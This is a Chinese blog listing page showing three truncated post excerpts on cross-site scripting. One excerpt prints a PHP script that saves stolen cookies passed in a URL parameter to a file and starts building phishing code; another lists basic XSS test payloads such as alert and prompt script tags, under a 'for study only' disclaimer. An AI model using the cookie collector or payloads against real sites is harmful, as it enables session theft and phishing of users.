摘要:
网站接受代码 <?php $content = $_GET['a']; if(isset($content)) { file_put_contents('tmp/cookie.txt',$content); }else{ echo 'no date input'; } ?> 构造钓鱼代码 <scri 阅读全文
posted @ 2022-01-18 16:57
LinkPoc
阅读(110)
评论(0)
推荐(0)
摘要:
博客园已设置httponly来限制js读取cookie,但仍可以进行跳转钓鱼等危险操作 阅读全文
posted @ 2022-01-18 16:20
LinkPoc
阅读(47)
评论(0)
推荐(0)
摘要:
###本文仅供学习探讨,切勿用于非法行为。 ###大型站点测试为了防止影响业务最好不要弹窗,使用console.log输出 XSS弹窗 <script>alert(/xss/)</script> <script>confirm('xss')</script> <script>prompt('xss' 阅读全文
posted @ 2022-01-18 16:18
LinkPoc
阅读(282)
评论(0)
推荐(0)
浙公网安备 33010602011771号